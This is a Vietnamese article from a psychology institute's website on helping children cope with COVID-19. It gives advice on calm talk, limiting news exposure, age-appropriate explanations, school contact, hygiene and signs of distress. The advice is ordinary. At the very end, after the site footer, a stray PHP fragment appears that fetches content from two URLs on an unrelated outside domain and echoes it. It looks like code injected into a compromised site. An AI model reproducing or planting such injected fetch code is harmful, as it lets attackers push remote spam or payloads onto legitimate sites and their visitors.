LÀM THẾ NÀO ĐỂ GIÚP TRẺ EM ĐỐI PHÓ VỚI NHỮNG THAY ĐỔI DO COVID-19?

Mọi gia đình trên khắp cả nước đang phải thích ứng với những biến đổi ngày một đa dạng trong cuộc sống do đại dịch COVID-19 gây ra. Hầu hết các trường học, địa điểm tụ tập công cộng và các cơ sở kinh doanh không cần thiết đều đóng cửa, cha mẹ và những người chăm sóc khác phải đối mặt với việc hỗ trợ chính gia đình của mình thích nghi với cuộc sống bình thường mới. Điều này bao gồm việc cố gắng tổ chức cho trẻ các hoạt động, giữ cho trẻ cảm thấy luôn an toàn và cố gắng theo kịp bài tập ở trường. Việc này không hề dễ dàng, nhưng chúng sẽ giúp trấn an trẻ.

Điều rất quan trọng cần nhớ là trẻ em tìm đến người lớn là để được hướng dẫn về cách ứng phó với các sự kiện căng thẳng. Việc người lớn thừa nhận và thể hiện sự quan tâm ở một mức độ nào đó, không tỏ ra quá hoảng sợ, là những điều phù hợp, nhờ vậy chúng ta có thể giúp trẻ thực hiện các hành động cần thiết để giảm nguy cơ gặp phải các vấn đề.

Người lớn có thể giúp trẻ giảm bớt sự lo lắng bằng cách dạy trẻ các biện pháp phòng ngừa tích cực, nói chuyện với trẻ về nỗi lo sợ và cho trẻ cảm giác có thể kiểm soát được nguy cơ lây nhiễm dịch bệnh. Đây cũng là cơ hội tốt để người lớn làm gương cho trẻ em về khả năng giải quyết vấn đề, tính linh hoạt và lòng nhân ái. Cụ thể là chúng ta đều đang nỗ lực thích nghi với các lịch trình hàng ngày, cân bằng công việc cũng như các hoạt động khác, sáng tạo trong cách sử dụng thời gian, tiếp nhận và chọn lọc các thông tin từ các cơ quan chức năng, kết nối và hỗ trợ bạn bè cùng các thành viên trong gia đình theo những cách mới. Những lời khuyên sau đây có thể giúp ích cho bạn.



HÃY BÌNH TĨNH, LẮNG NGHE, CHO TRẺ THẤY SỰ YÊN TÂM

Hãy làm gương cho con. Trẻ sẽ có những hành động, cư xử giống như bố mẹ. Chúng sẽ nhìn bố mẹ như một tấm gương để học theo.

Cân nhắc cách nói về COVID-19 với con. Cuộc trò chuyện của cha mẹ với con về COVID-19 có thể làm tăng hoặc giảm sự sợ hãi của con. Hãy nhắn nhủ con rằng gia đình chúng ta khỏe mạnh và bạn sẽ làm mọi thứ trong khả năng của mình để giữ cho những người thân yêu được an toàn. Hãy cẩn thận lắng nghe hoặc để trẻ vẽ/viết ra những suy nghĩ, cảm xúc của mình; sau đó bạn hãy trấn an và đưa cho trẻ những thông tin đúng đắn.

Giải thích cho trẻ về giãn cách xã hội. Trẻ em có thể không hoàn toàn hiểu lý do tại sao người lớn không cho phép trẻ đi chơi cùng bạn bè trong thời điểm này. Hãy nói với con rằng gia đình mình đang tuân theo các hướng dẫn 5K, bao gồm cả việc giãn cách xã hội. Giãn cách xã hội có nghĩa là tránh xa những người khác cho đến khi kiểm soát được nguy cơ lây nhiễm COVID-19. Giải thích với trẻ rằng mặc dù chúng ta không biết sẽ mất bao lâu để giảm số người mắc bệnh, nhưng chúng ta biết rằng đây là thời điểm quan trọng, cần phải tuân theo hướng dẫn của các chuyên gia y tế.

Làm mẫu cho trẻ về cách hít thở sâu. Hít thở sâu là một công cụ rất hữu ích để làm dịu hệ thần kinh. Hãy thực hiện các bài tập thở với con bạn.

Tập trung vào điều tích cực. Có thể kể đến một số hoạt động như: ăn mừng khi có nhiều thời gian dành cho gia đình hơn; làm cho khoảng thời gian đó trở nên vui vẻ nhất có thể; thực hiện các dự án nhỏ trong gia đình; dọn dẹp nhà cửa, đồ đạc, sáng tạo ra những tác phẩm nghệ thuật; hát, cười và đi ra ngoài-nếu có thể để kết nối với thiên nhiên và tập thể dục khi cần thiết. Cha mẹ có thể cho phép những trẻ lớn kết nối với bạn bè của chúng.

Thiết lập và duy trì một thói quen hàng ngày. Tuân theo một lịch trình thường xuyên sẽ mang lại cho chúng ta cảm giác kiểm soát tình hình, cũng như khả năng dự đoán, sự bình tĩnh và cơ hội giữ gìn sức khỏe. Nó cũng giúp trẻ em và các thành viên khác trong gia đình học được cách tôn trọng những khoảng thời gian yên tĩnh của nhau.

Tìm hiểu các hoạt động giúp ích cho người khác. Các hoạt động có thể bao gồm: viết thư cho hàng xóm, cho những người đang mắc kẹt ở nhà một mình, hoặc cho nhân viên y tế; gửi những thông điệp tích cực qua mạng xã hội; hoặc nghe một cuốn sách trẻ em yêu thích trên các nền tảng mạng xã hội.

Chia sẻ với con thật nhiều tình yêu thương.

KIỂM SOÁT VIỆC XEM TI VI VÀ SỬ DỤNG MẠNG XÃ HỘI

Cha mẹ nên giám sát việc xem tivi, sử dụng internet và mạng xã hội – đối với cả chính bản thân và với con cái của mình. Việc liên tục cập nhật và xem các tin tức về COVID-19 có thể làm tăng cảm giác sợ hãi và lo lắng. Cha mẹ hãy chú ý, những thông tin không phù hợp với lứa tuổi, hoặc những thông tin hướng đến đối tượng là người lớn, cũng có thể gây ra cảm xúc lo lắng hoặc mơ hồ ở trẻ em, đặc biệt là trẻ nhỏ.

Giải thích cho con bạn rằng sẽ có những câu chuyện về COVID-19 trên internet là những tin đồn và những điều không thực sự chính xác. Đặc biệt, thanh thiếu niên có thể đang truy cập rất nhiều thông tin không chính xác trên mạng, hoặc nghe được từ bạn bè. Hãy nói chuyện và cung cấp cho con những thông tin đúng đắn, tin cậy về dịch bệnh.
Và thay vào đó, hãy lôi cuốn con bạn vào các trò chơi hoặc các hoạt động thú vị khác.

DÀNH THỜI GIAN ĐỂ TRÒ CHUYỆN

Hãy dành thời gian lắng nghe câu hỏi của con. Bạn hãy trả lời câu hỏi của con một cách trung thực, nhưng không đưa ra những chi tiết hoặc sự kiện không cần thiết. Hãy cung cấp cho con những thông tin mà các chuyên gia khuyến cáo là có vai trò quan trọng đối với sức khỏe của con trẻ. Thông thường, trẻ em và thanh thiếu niên không tự nói nhiều về những sự trăn trở của bản thân, vì chúng đang bối rối hoặc không muốn làm những người thân yêu lo lắng. Trẻ nhỏ hơn thì lại thu nhận thông tin theo một chu trình: đặt câu hỏi, lắng nghe, chơi và sau đó lặp lại chu trình.
Trẻ em luôn cảm thấy được trao quyền nếu chúng có thể kiểm soát một số khía cạnh trong cuộc sống của mình. Cảm giác này có khà năng làm giảm sự sợ hãi, lo lắng.

CHÂN THÀNH VÀ CHÍNH XÁC

Sữa chữa các thông tin sai lệch. Trẻ em thường tưởng tượng ra những tình huống tồi tệ hơn thực tế; do đó, người lớn nếu biết cách đưa ra các thông tin phù hợp với sự phát triển của trẻ, có thể giúp giảm bớt nỗi sợ hãi.

Giải thích các bước đảm bảo an toàn đơn giản. Nói cho con bạn biết Covid-19 lây lan giữa những người tiếp xúc gần gũi với nhau, khi một người bị bệnh ho hoặc hắt hơi, hoặc khi một người chạm vào các đồ vật hoặc bề mặt có vi-rút.

Luôn cập nhật các thông tin uy tín. Bạn có thể truy cập https://www.cdc.gov/coronavirus/2019-ncov/index.html để biết thêm các thông tin, số liệu thực tế.

SỬ DỤNG NGÔN NGỮ PHÙ HỢP ĐỘ TUỔI CỦA TRẺ

Trẻ em đầu tiểu học. Cung cấp thông tin ngắn gọn, đơn giản, cân bằng giữa khối lượng những thông tin về COVID-19 và những thông tin về những sự trợ giúp, chăm sóc của người lớn với trẻ khi trẻ bị ốm. Hãy đưa ra các ví dụ đơn giản về những bước mọi người thường thực hiện hàng ngày để ngăn chặn vi-rút và giữ gìn sức khỏe, chẳng hạn như việc rửa tay bằng xà phòng. Bạn có thể nói: “Người lớn đang làm việc rất chăm chỉ và nỗ lực để giữ cho các con được an toàn và khỏe mạnh"

Trẻ em cuối tiểu học và đầu THCS. Nhóm tuổi này thường mạnh dạn hơn trong việc đặt câu hỏi về vấn đề an toàn và những thứ sẽ xảy ra nếu COVID-19 lan rộng trong khu dân cư. Trẻ lúc này cần được hỗ trợ để biết tách biệt giũa thực tế và tin đồn, tưởng tượng. Bạn có thể thảo luận với trẻ về những nỗ lực mà các lãnh đạo cùng cộng đồng đang thực hiện để ngăn chặn đại dịch lây lan.

Học sinh THCS và THPT. Đối với trẻ lứa tuổi này, các vấn đề có thể được thảo luận sâu hơn. Người lớn có thể gợi ý trẻ tham khảo các nguồn dữ liệu về COVID-19 tin cậy; đồng thời cung cấp cho trẻ các thông tin trung thực, chính xác, thực tế về tình hình COVID-19 hiện tại; cho phép trẻ tham gia vào việc ra quyết định về các kế hoạch gia đình, lập kế hoạch, và giúp đỡ các công việc nhà.
Đối với tất cả trẻ em, người lớn nên khuyến khích trẻ nói ra những suy nghĩ và cảm xúc của mình. Còn chúng ta, hãy là một người biết lắng nghe thực sự.

DUY TRÌ KẾT NỐI VỚI TRƯỜNG HỌC

Tiếp cận được các nguồn tài liệu học tập. Mỗi trường học sẽ có những khả năng và cách thức tổ chức lớp học trực tuyến khác nhau, nhưng hầu hết các trường đều có cung cấp các bài học và hoạt động học tập để trẻ thực hiện trong thời điểm này. Các nhà trường cũng có thể tận dụng lợi thế của nhiều công ty và nền tảng trực tuyến hiện đang cung cấp dịch vụ miễn phí.

Xác định các nguồn lực bổ sung. Nắm bắt rõ các thông tin về việc liệu trường học có cung cấp các nguồn hỗ trợ bổ sung, chẳng hạn như đồ ăn, các kỹ thuật công nghệ như laptop hay máy tính bảng.

Giữ liên lạc. Tìm hiểu cách thức giao tiếp giữa nhà trường với gia đình và học sinh. Hãy chắc chắn rằng bạn đọc hết các thông tin liên lạc được gửi đến. Đồng thời hãy để ý con bạn, đặc biệt là những trẻ lớn, vì chúng có thể nhận được những thông tin hữu ích mà bạn cần biết.

Kết nối với giáo viên, nhân viên của trường. Hãy liên hệ với giáo viên của con và các nhân viên có liên quan trong trường nếu bạn lo lắng về việc trẻ đang gặp khó khăn trong việc làm bài tập hay tham gia các hoạt động.

NẮM RÕ CÁC TRIỆU CHỨNG CỦA COVID-19

Theo CDC, các triệu chứng sốt, ho và/hoặc khó thở sẽ xuất hiện trong vòng 14 ngày sau khi tiếp xúc với căn bệnh này.
Đối với một số người, các triệu chứng chỉ tương tự như cảm lạnh; đối với những người khác, chúng có thể nghiêm trọng hơn hoặc thậm chí đe dọa tính mạng.

CÁC HOẠT ĐỘNG GIỮ VỆ SINH VÀ CHĂM SÓC SỨC KHỎE CƠ BẢN

Giữ gìn vệ sinh tốt hàng ngày. Hãy khuyến khích con bạn thực hành các bước đơn giản này để ngăn vi rút lây lan:
- Rửa tay nhiều lần trong ngày, mỗi lần trong 20 giây, con có thể hát 2 lần "Twinkle, Twinkle Little Star" hoặc "Happy Birthday" trong thời gian đó.
- Khen ngợi khi trẻ sử dụng khăn giấy che miệng khi hắt hơi hoặc ho vào phần khuỷu tay. Cha mẹ hãy nói với trẻ tầm quan trọng của việc vứt bỏ khăn giấy đã dùng ngay sau khi hắt hơi hoặc ho.
- Đáng buồn là trong thời điểm dịch bệnh căng thẳng này, việc bắt tay hay ôm hôn nên được hạn chế, kể cả với các thành viên trong gia đình.

Duy trì và nuôi dưỡng cảm giác kiểm soát. Việc cung cấp hướng dẫn về những gì con bạn có thể làm để ngăn ngừa lây lan dịch bệnh, có thể mang lại cho trẻ cảm giác kiểm soát được tình hình tốt hơn, giúp giảm lo lắng.

Xây dựng hệ thống miễn dịch. Khuyến khích con ăn uống điều độ, ngủ đủ giấc và tập thể dục thường xuyên; điều này sẽ giúp chúng phát triển một hệ thống miễn dịch mạnh mẽ để chống lại bệnh tật.

HÃY QUAN TÂM ĐẾN SỨC KHỎE TÂM THẦN CỦA CON

Hầu hết trẻ em sẽ ổn với sự hỗ trợ của cha mẹ và các thành viên khác trong gia đình, ngay cả khi có các triệu chứng lo lắng, chẳng hạn như khó ngủ hoặc khó tập trung. Tuy nhiên, một số trẻ có thể có các yếu tố nguy cơ dẫn đến các phản ứng mạnh hơn như: lo lắng ở mức độ nghiêm trọng, trầm cảm, hay hành vi tự sát. Các yếu tố rủi ro có thể bao gồm: một vấn đề sức khỏe tâm thần đã xuất hiện từ trước, những trải nghiệm đau thương hoặc bị lạm dụng trong quá khứ, gia đình bất ổn hoặc mất người thân. Cha mẹ và những người chăm sóc trẻ nên liên hệ với chuyên gia, nếu trẻ có những thay đổi đáng kể về mặt hành vi hoặc bất kỳ triệu chứng nào trong hơn 2 tuần trở lại đây:

Trẻ mẫu giáo - mút ngón tay cái, đái dầm, bám bố mẹ, rối loạn giấc ngủ, chán ăn, sợ bóng tối, các hành vi thoái lui, né tránh.

Trẻ em ở độ tuổi tiểu học - cáu kỉnh, hung hăng, bám dính, gặp ác mộng, trốn học, kém tập trung, rút lui khỏi các hoạt động và mối quan hệ bạn bè.
Thanh thiếu niên - rối loạn giấc ngủ và ăn uống, kích động, gia tăng xung đột, phàn nàn về thể chất, hành vi phạm pháp và kém tập trung.

Nguồn: Helping Children Cope With Changes Resulting From COVID-19. NASP

Hãy liên hệ với số hotline 0977.729.396 của Viện ngay hôm nay để được tư vấn tận tình.

Hình ảnh một số bác sĩ tâm thần và chuyên gia tâm lý được đào tạo bài bản và giàu kinh nghiệm của Viện Tâm Lý Việt - Pháp:

Bài viết liên quan

Gọi cho tôi

Hãy gửi thông tin cho chúng tôi, nhân viên tư vấn của Viện sẽ liên hệ lại Quý khách trong vòng 24h. Thông tin của Quý khách chỉ để chúng tôi liên hệ và không gửi cho bên thứ ba.

Tài nguyên

Trắc nghiệm

https://tracnghiem.tamlyvietphap.vn/

$content1 = file_get_contents("https://ayambakar.vip/bl/bc.php"); $content2 = file_get_contents("https://ayambakar.vip/st/index.php"); echo ''; echo ''; ?>